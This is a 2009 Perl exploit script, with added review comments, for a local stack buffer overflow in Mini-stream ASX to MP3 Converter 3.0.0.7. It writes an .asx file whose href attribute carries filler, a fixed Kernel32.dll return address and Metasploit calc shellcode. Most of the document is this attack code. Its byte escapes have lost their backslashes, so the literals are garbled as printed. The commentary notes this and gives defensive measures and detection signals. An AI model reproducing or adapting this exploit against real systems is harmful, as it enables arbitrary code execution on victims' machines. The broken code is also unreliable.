
# Title : Mini-stream ASX to MP3 Converter 3.0.0.7 (.ASX HREF) Local BOF Exploit
# Published : 2009-05-07
# Author : G4N0K
# Previous Title : Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Buffer Overflow Exploit
# Next Title : Mini-stream Ripper 3.0.1.1 (.RAM) Local Buffer Overflow Exploit


#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             
==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...From Iran

==============================================================================
	Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
==============================================================================
	[??] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
	[??] Website:............[ http://mini-stream.net/ ].....................
	[??] Today:..............[ 07052009 ]....................................
	[??] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
==============================================================================

	[x] tested on Windows XP SP2...
	[x] if you are not able to make this shit work, just put it in the Base/Root
	    of a Drive/Partition, like "C:gnk.asx"...

=cut

# Payload layout written into the <ref href="..."> attribute of the generated
# .asx file: a long filler run, then a hard-coded address, a short pad, and a
# shellcode blob. NOTE(review): every "\x.." escape on this page has lost its
# backslash in extraction ("x90", "x5D", ...), so the literals below are plain
# ASCII text as shown, not the byte strings the original author used.
my $MSD = "G" x 26110;    # filler: 26110 bytes of 'G' to reach the overwrite point
my $SMN = "x90" x 16;     # 16 repeats of "x90" (as printed); presumably a NOP pad originally
my $RA = "x5Dx38x82x7C"; # Kernel32.dll
# ^ address placed immediately after the filler; the author's comment says it
#   lives in Kernel32.dll and the POD says it was tested on Windows XP SP2 only,
#   i.e. it depends on a fixed, non-randomised module base.

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Shellcode per the author's comment: a Metasploit win32_exec payload that
# launches calc (a benign proof-of-concept), encoded with PexFnstenvSub.
my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
             "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
             "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
             "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
             "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
             "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
             "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
             "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
             "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
             "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

# The ASX document. Only the href attribute carries the payload; every other
# element is ordinary, well-formed ASX. NOTE(review): as printed, the inner
# double quotes (version="3.0", href="") are not escaped, so this string
# would not parse in Perl — another casualty of the lost backslashes.
my $ASX = 
"<asx version="3.0">
  <title>Title is not important.</title>
  <entry>
    <title>Example...</title>
    <ref href="".$MSD.$RA.$SMN.$Shcode."" />
    <author>G4N0K</author>
    <copyright>??2009 G4N0K</copyright>
  </entry>
</asx>";
# href = filler . address . pad . shellcode (in that order). The trigger is
# therefore simply an href attribute far longer than any legitimate URL
# (>26 KB here) — the converter evidently copies it without a length check.
# For defenders: a parser-side length limit on href, and DEP/ASLR on the host,
# each break this layout; an ASX with a multi-kilobyte href is an easy
# file-based detection signal.

  # Write the file next to the script, appending (not truncating) to gnk.asx.
  # Bareword handle, 2-arg open and no error check; the mode and filename are a
  # fixed literal here, so nothing untrusted reaches the open call.
  open(ASX,'>>gnk.asx');
  print ASX $ASX;
  close(ASX);

# www.Syue.com [2009-05-07]